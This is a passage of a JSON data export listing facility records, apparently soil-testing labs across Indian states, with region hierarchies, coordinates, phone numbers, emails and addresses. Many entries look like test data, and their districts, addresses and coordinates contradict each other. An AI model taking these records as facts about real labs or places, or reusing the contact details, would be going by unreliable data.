Kalthur","version":"2","status":"Inhabitant","createdAt":"2023-02-25T07:29:14.519Z","updatedAt":"2023-10-25T17:09:57.689Z","__v":0,"block":"6492fbec680216eb6c93f9b7","code":"608835","details":{"codestatus":true}},"subdistrict":{"_id":"63f9a6f8519359b7438b1126","state":"63f99fbd519359b7438a84ca","district":"63f9a5f7519359b7438afd6f","name":"AJJAMPURA","createdAt":"2023-02-25T06:13:12.013Z","updatedAt":"2023-02-25T06:13:12.013Z","__v":0}},"timing":{"from":"","to":""},"phone":"+916362686300","address":"99FH+QWG Singaram (P) Veldevi, Telangana, India","authenticatedUser":"6633455be45603840e0c7c2b","createdAt":"2024-05-02T07:48:43.782Z","updatedAt":"2024-05-02T07:48:43.782Z","email":"krishika@gmail.com"},{"name":"Private","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9b89c519359b7438c7e77","state":"63f99fbd519359b7438a84ca","name":"UDUPI","createdAt":"2023-02-25T07:28:28.688Z","updatedAt":"2023-10-02T13:44:42.183Z","__v":0,"code":"549"},"geolocation":{"type":"Point","coordinates":[76.9558,11.016799999999995]},"village":{"_id":"63f9b8b0519359b7438c802c","state":"63f99fbd519359b7438a84ca","district":"63f9b89c519359b7438c7e77","subdistrict":"63f9b8ad519359b7438c7fdf","name":"33 Shiroor","version":"1","status":"Inhabitant","createdAt":"2023-02-25T07:28:48.926Z","updatedAt":"2023-10-25T17:06:08.896Z","__v":0,"block":"6492fbec680216eb6c93f9b3","code":"608784","details":{"codestatus":true}},"subdistrict":{"_id":"63f9a6f8519359b7438b1126","state":"63f99fbd519359b7438a84ca","district":"63f9a5f7519359b7438afd6f","name":"AJJAMPURA","createdAt":"2023-02-25T06:13:12.013Z","updatedAt":"2023-02-25T06:13:12.013Z","__v":0}},"timing":{"from":"","to":""},"phone":"+916362686300","address":"2X84+P8F Coimbatore, Tamil Nadu, India","authenticatedUser":"66334888e45603840e0c7c9e","createdAt":"2024-05-02T08:02:16.262Z","updatedAt":"2024-05-02T08:02:16.262Z","email":"thanvika@gmail.com"},{"name":"Krishi","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9b89c519359b7438c7e77","state":"63f99fbd519359b7438a84ca","name":"UDUPI","createdAt":"2023-02-25T07:28:28.688Z","updatedAt":"2023-10-02T13:44:42.183Z","__v":0,"code":"549"},"geolocation":{"type":"Point","coordinates":[78.3232033149171,14.445899687446676]},"village":{"_id":"63f9b8ca519359b7438c8255","state":"63f99fbd519359b7438a84ca","district":"63f9b89c519359b7438c7e77","subdistrict":"63f9b8c8519359b7438c8226","name":"108 Kalthur","version":"2","status":"Inhabitant","createdAt":"2023-02-25T07:29:14.519Z","updatedAt":"2023-10-25T17:09:57.689Z","__v":0,"block":"6492fbec680216eb6c93f9b7","code":"608835","details":{"codestatus":true}},"subdistrict":{"_id":"63f9aa61519359b7438b5211","state":"63f99fbd519359b7438a84ca","district":"63f9aa61519359b7438b520e","name":"Aland","createdAt":"2023-02-25T06:27:45.911Z","updatedAt":"2023-02-25T06:27:45.911Z","__v":0}},"timing":{"from":"","to":""},"phone":"+916362686304","address":"C8WF+974 Gotur, Andhra Pradesh, India","authenticatedUser":"66334ceae45603840e0c7e12","createdAt":"2024-05-02T08:20:59.000Z","updatedAt":"2024-05-02T08:20:59.000Z","email":"thakshi@gmail.com"},{"name":"Public","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9b89c519359b7438c7e77","state":"63f99fbd519359b7438a84ca","name":"UDUPI","createdAt":"2023-02-25T07:28:28.688Z","updatedAt":"2023-10-02T13:44:42.183Z","__v":0,"code":"549"},"geolocation":{"type":"Point","coordinates":[78.6339767955801,13.782842548931676]},"village":{"_id":"63f9b8ac519359b7438c7fd0","state":"63f99fbd519359b7438a84ca","district":"63f9b89c519359b7438c7e77","subdistrict":"63f9b89c519359b7438c7e7a","name":"Ajri","version":"1","status":"Inhabitant","createdAt":"2023-02-25T07:28:44.910Z","updatedAt":"2023-10-25T17:05:34.655Z","__v":0,"block":"6492fbec680216eb6c93f9bb","code":"608718","details":{"codestatus":true}},"subdistrict":{"_id":"6492b7fc882c8da847737078","state":"63f99fbd519359b7438a84ca","district":"63f9ab56519359b7438b6478","name":"Alur","createdAt":"2023-06-21T08:42:36.412Z","updatedAt":"2023-06-21T08:42:36.412Z","__v":0}},"timing":{"from":"","to":""},"phone":"+916362686300","address":"QJMM+4HQ Chittiboyanapalle, Andhra Pradesh, India","authenticatedUser":"663365d3e45603840e0c815b","createdAt":"2024-05-02T10:07:16.198Z","updatedAt":"2024-05-02T10:07:16.198Z","email":"navya@gmail.com"},{"name":"Test lab","region":{"state":{"_id":"63f5ceb98cec41e6c95ce3a8","name":"DELHI","createdAt":"2023-02-22T08:13:45.282Z","updatedAt":"2023-10-02T12:57:58.179Z","__v":0,"code":"7"},"district":{"_id":"63f5ceb98cec41e6c95ce3ab","state":"63f5ceb98cec41e6c95ce3a8","name":"CENTRAL","createdAt":"2023-02-22T08:13:45.400Z","updatedAt":"2023-11-17T10:44:28.797Z","__v":0,"code":"77"},"geolocation":{"type":"Point","coordinates":[75.21546850828726,15.963519083200419]},"village":{"_id":"63f5ceb98cec41e6c95ce3b0","state":"63f5ceb98cec41e6c95ce3a8","district":"63f5ceb98cec41e6c95ce3ab","subdistrict":"63f5ceb98cec41e6c95ce3ae","name":"Badar Pur Majra Burari","version":"1","status":"Inhabitant","createdAt":"2023-02-22T08:13:45.590Z","updatedAt":"2023-11-15T20:07:07.479Z","__v":0,"block":"65551c65b11dfae9f93ef0ed","code":"63952","details":{"codestatus":true}},"subdistrict":{"_id":"63f5cec78cec41e6c95ce4cd","state":"63f5ceb98cec41e6c95ce3a8","district":"63f5cebf8cec41e6c95ce430","name":"Alipur","createdAt":"2023-02-22T08:13:59.793Z","updatedAt":"2023-02-22T08:13:59.793Z","__v":0}},"timing":{"from":"","to":""},"phone":"+917878787878","address":"X678+C54 Chilamur, Karnataka, India","authenticatedUser":"66449bd8464f486de4e9fda5","createdAt":"2024-05-15T11:26:16.384Z","updatedAt":"2024-05-15T11:26:16.384Z","email":"abcd123454@gmail.com"},{"name":"sukka","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a161519359b7438aa3ec","state":"63f99fbd519359b7438a84ca","name":"BENGALURU RURAL","createdAt":"2023-02-25T05:49:21.765Z","updatedAt":"2023-10-02T13:44:37.862Z","__v":0,"code":"526"},"geolocation":{"type":"Point","coordinates":[78.09530244629579,14.117909662799963]},"village":{"_id":"63f9a195519359b7438aa7e3","state":"63f99fbd519359b7438a84ca","district":"63f9a161519359b7438aa3ec","subdistrict":"63f9a161519359b7438aa3ef","name":"Agalakuppa","version":"2","status":"Inhabitant","createdAt":"2023-02-25T05:50:13.458Z","updatedAt":"2023-10-24T17:45:21.277Z","__v":0,"block":"6492fbde680216eb6c93f873","code":"624733","details":{"codestatus":true}},"subdistrict":{"_id":"63f9a574519359b7438af34e","state":"63f99fbd519359b7438a84ca","district":"63f9a4c8519359b7438ae645","name":"ALMEL","createdAt":"2023-02-25T06:06:44.559Z","updatedAt":"2023-02-25T06:06:44.559Z","__v":0}},"timing":{"from":"","to":""},"phone":"+916577654567","address":"439W+547 Donnikota, Andhra Pradesh, India","authenticatedUser":"6645ac4992f83d839cdf513f","createdAt":"2024-05-16T06:48:41.687Z","updatedAt":"2024-05-16T06:49:02.869Z","email":"sukka@gmail.com"},{"name":"Static","region":{"state":{"_id":"63f87562d2e83876f03f7a2c","name":"MEGHALAYA","createdAt":"2023-02-24T08:29:22.513Z","updatedAt":"2023-10-02T12:57:59.999Z","__v":0,"code":"17"},"district":{"_id":"63f87562d2e83876f03f7a2f","state":"63f87562d2e83876f03f7a2c","name":"EAST GARO HILLS","createdAt":"2023-02-24T08:29:22.606Z","updatedAt":"2023-10-02T13:43:42.425Z","__v":0,"code":"273"},"geolocation":{"type":"Point","coordinates":[77.32872817679558,17.15503090942182]},"village":{"_id":"63f8759ed2e83876f03f7fc2","state":"63f87562d2e83876f03f7a2c","district":"63f87562d2e83876f03f7a2f","subdistrict":"63f8758dd2e83876f03f7e21","name":"Aberamgre","version":"1","status":"Inhabitant","createdAt":"2023-02-24T08:30:22.406Z","updatedAt":"2023-10-24T16:51:09.719Z","__v":0,"block":"6492fc51680216eb6c940145","code":"275203","details":{"codestatus":true}},"subdistrict":{"_id":"6492b80a882c8da8477370f4","state":"63f87562d2e83876f03f7a2c","district":"63f879b6d2e83876f03fe05c","name":"Adokgre","createdAt":"2023-06-21T08:42:50.989Z","updatedAt":"2023-06-21T08:42:50.989Z","__v":0}},"timing":{"from":"","to":""},"phone":"+911231231231","address":"584H+2F9 Injepalli, Karnataka, India","authenticatedUser":"664b3873ce180da35c2083ac","createdAt":"2024-05-20T11:48:03.488Z","updatedAt":"2024-05-20T11:48:03.488Z","email":"abcd4345345@gmail.com"},{"name":"meg","region":{"state":{"_id":"63f87562d2e83876f03f7a2c","name":"MEGHALAYA","createdAt":"2023-02-24T08:29:22.513Z","updatedAt":"2023-10-02T12:57:59.999Z","__v":0,"code":"17"},"district":{"_id":"63f87562d2e83876f03f7a2f","state":"63f87562d2e83876f03f7a2c","name":"EAST GARO HILLS","createdAt":"2023-02-24T08:29:22.606Z","updatedAt":"2023-10-02T13:43:42.425Z","__v":0,"code":"273"},"geolocation":{"type":"Point","coordinates":[77.57734696132593,14.912032676854436]},"village":{"_id":"63f8759ed2e83876f03f7fc2","state":"63f87562d2e83876f03f7a2c","district":"63f87562d2e83876f03f7a2f","subdistrict":"63f8758dd2e83876f03f7e21","name":"Aberamgre","version":"1","status":"Inhabitant","createdAt":"2023-02-24T08:30:22.406Z","updatedAt":"2023-10-24T16:51:09.719Z","__v":0,"block":"6492fc51680216eb6c940145","code":"275203","details":{"codestatus":true}},"subdistrict":{"_id":"6492b80a882c8da8477370f4","state":"63f87562d2e83876f03f7a2c","district":"63f879b6d2e83876f03fe05c","name":"Adokgre","createdAt":"2023-06-21T08:42:50.989Z","updatedAt":"2023-06-21T08:42:50.989Z","__v":0}},"timing":{"from":"","to":""},"phone":"+911971134206","address":"WH6G+RW9 Kalluru, Andhra Pradesh, India","authenticatedUser":"66585db9abc03299423b0ca6","createdAt":"2024-05-30T11:06:33.507Z","updatedAt":"2024-05-30T11:06:33.507Z","email":"abc@c.coms"},{"name":"agra VLSTL","region":{"state":{"_id":"63f600f38cec41e6c9607e6b","name":"UTTAR PRADESH","createdAt":"2023-02-22T11:48:03.783Z","updatedAt":"2023-10-02T12:57:58.538Z","__v":0,"code":"9"},"district":{"_id":"63f600f38cec41e6c9607e6e","state":"63f600f38cec41e6c9607e6b","name":"AGRA","createdAt":"2023-02-22T11:48:03.883Z","updatedAt":"2023-10-02T13:43:07.424Z","__v":0,"code":"118"},"geolocation":{"type":"Point","coordinates":[79.41455237396404,27.723479412797673]},"village":{"_id":"63f6014d8cec41e6c960869c","state":"63f600f38cec41e6c9607e6b","district":"63f600f38cec41e6c9607e6e","subdistrict":"63f6012e8cec41e6c96083d4","name":"Aaraji Emlak","version":"1","status":"Inhabitant","createdAt":"2023-02-22T11:49:33.070Z","updatedAt":"2023-02-22T11:49:33.070Z","__v":0},"subdistrict":{"_id":"64140e54c2826eb7b748ad04","state":"63f600f38cec41e6c9607e6b","district":"641835a3f6fb3c67a030fb1a","name":"ASPUR DEOSARA","createdAt":"2023-03-17T06:53:08.238Z","updatedAt":"2023-03-17T06:53:08.238Z","__v":0}},"timing":{"from":"","to":""},"phone":"+917878787878","address":"PCF7+9RV Piluaa, Uttar Pradesh, India","authenticatedUser":"6658685ef069e92950d470cb","createdAt":"2024-05-30T11:51:59.078Z","updatedAt":"2024-05-30T11:51:59.078Z","email":"abcd45865@gmail.com"},{"name":"eastern","region":{"state":{"_id":"63f87562d2e83876f03f7a2c","name":"MEGHALAYA","createdAt":"2023-02-24T08:29:22.513Z","updatedAt":"2023-10-02T12:57:59.999Z","__v":0,"code":"17"},"district":{"_id":"63f87562d2e83876f03f7a2f","state":"63f87562d2e83876f03f7a2c","name":"EAST GARO HILLS","createdAt":"2023-02-24T08:29:22.606Z","updatedAt":"2023-10-02T13:43:42.425Z","__v":0,"code":"273"},"geolocation":{"type":"Point","coordinates":[77.10082635976883,11.875362215607213]},"village":{"_id":"63f8759ed2e83876f03f7fc2","state":"63f87562d2e83876f03f7a2c","district":"63f87562d2e83876f03f7a2f","subdistrict":"63f8758dd2e83876f03f7e21","name":"Aberamgre","version":"1","status":"Inhabitant","createdAt":"2023-02-24T08:30:22.406Z","updatedAt":"2023-10-24T16:51:09.719Z","__v":0,"block":"6492fc51680216eb6c940145","code":"275203","details":{"codestatus":true}},"subdistrict":{"_id":"6492b80a882c8da8477370f4","state":"63f87562d2e83876f03f7a2c","district":"63f879b6d2e83876f03fe05c","name":"Adokgre","createdAt":"2023-06-21T08:42:50.989Z","updatedAt":"2023-06-21T08:42:50.989Z","__v":0}},"timing":{"from":"","to":""},"phone":"+912345678645","address":"V4G2+48W Punajur State Forest, Karnataka, India","authenticatedUser":"66616b2dfecdfea559965035","createdAt":"2024-06-06T07:54:21.397Z","updatedAt":"2024-06-06T07:54:21.397Z","email":"vikas12@gmail.com"},{"name":"anups","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9bb71519359b7438cbce7","state":"63f99fbd519359b7438a84ca","name":"RAMANAGARA","createdAt":"2023-02-25T07:40:33.876Z","updatedAt":"2023-10-02T13:44:41.643Z","__v":0,"code":"631"},"geolocation":{"type":"Point","coordinates":[75.8784513014314,11.38833784512897]},"village":{"_id":"63f9bbdd519359b7438cc709","state":"63f99fbd519359b7438a84ca","district":"63f9bb71519359b7438cbce7","subdistrict":"63f9bbcb519359b7438cc545","name":"Abbur","version":"1","status":"Inhabitant","createdAt":"2023-02-25T07:42:21.715Z","updatedAt":"2023-10-25T19:04:16.992Z","__v":0,"block":"6492fbea680216eb6c93f985","code":"626242","details":{"codestatus":true}},"subdistrict":{"_id":"63f9bbcb519359b7438cc545","state":"63f99fbd519359b7438a84ca","district":"63f9bb71519359b7438cbce7","name":"Channapatna","createdAt":"2023-02-25T07:42:03.540Z","updatedAt":"2023-02-25T07:42:03.540Z","__v":0}},"timing":{"from":"","to":""},"phone":"+912345645675","address":"9VQH+89P Moorkan Kundu, Kerala, India","authenticatedUser":"66616eacfecdfea559965086","createdAt":"2024-06-06T08:09:16.690Z","updatedAt":"2024-06-06T08:09:16.690Z","email":"anup321@gmail.com"},{"name":"shc soil","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a421519359b7438ad9a9","state":"63f99fbd519359b7438a84ca","name":"BIDAR","createdAt":"2023-02-25T06:01:05.630Z","updatedAt":"2023-10-02T13:44:38.407Z","__v":0,"code":"529"},"geolocation":{"type":"Point","coordinates":[76.20994364640883,11.022519562465448]},"village":{"_id":"63f9a44e519359b7438add39","state":"63f99fbd519359b7438a84ca","district":"63f9a421519359b7438ad9a9","subdistrict":"63f9a43a519359b7438adb98","name":"Ahmadabad","version":"1","status":"Inhabitant","createdAt":"2023-02-25T06:01:50.978Z","updatedAt":"2023-10-24T19:59:51.884Z","__v":0,"block":"6492fbde680216eb6c93f885","code":"599897","details":{"codestatus":true}},"subdistrict":{"_id":"63f9a6f8519359b7438b1126","state":"63f99fbd519359b7438a84ca","district":"63f9a5f7519359b7438afd6f","name":"AJJAMPURA","createdAt":"2023-02-25T06:13:12.013Z","updatedAt":"2023-02-25T06:13:12.013Z","__v":0}},"timing":{"from":"","to":""},"phone":"+915467876567","address":"26F5+2X4 Nenmini, Kerala, India","authenticatedUser":"6661af52fcf2644158dc16f6","createdAt":"2024-06-06T12:45:06.991Z","updatedAt":"2024-06-06T12:45:06.991Z","email":"rishab@gmail.com"},{"name":"barish","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a066519359b7438a9120","state":"63f99fbd519359b7438a84ca","name":"BENGALURU URBAN","createdAt":"2023-02-25T05:45:10.832Z","updatedAt":"2023-10-02T13:44:38.223Z","__v":0,"code":"525"},"geolocation":{"type":"Point","coordinates":[14.83819327045858,76.45856243093922]},"village":{"_id":"63f9a0ae519359b7438a9659","state":"63f99fbd519359b7438a84ca","district":"63f9a066519359b7438a9120","subdistrict":"63f9a09c519359b7438a950d","name":"BASAVANAPURA","version":"1","status":"Inhabitant","createdAt":"2023-02-25T05:46:22.053Z","updatedAt":"2023-02-25T05:46:22.053Z","__v":0},"subdistrict":{"_id":"63f9a6f8519359b7438b1126","state":"63f99fbd519359b7438a84ca","district":"63f9a5f7519359b7438afd6f","name":"AJJAMPURA","createdAt":"2023-02-25T06:13:12.013Z","updatedAt":"2023-02-25T06:13:12.013Z","__v":0}},"timing":{"from":"","to":""},"phone":"+913456789786","address":"RFQ5+7CF Adavi Sooravvana, Karnataka, India","authenticatedUser":"6661b13e5e1ab7f2357e9f2a","createdAt":"2024-06-06T12:53:18.554Z","updatedAt":"2024-06-06T12:53:18.554Z","email":"harsha@gmail.com"}]}}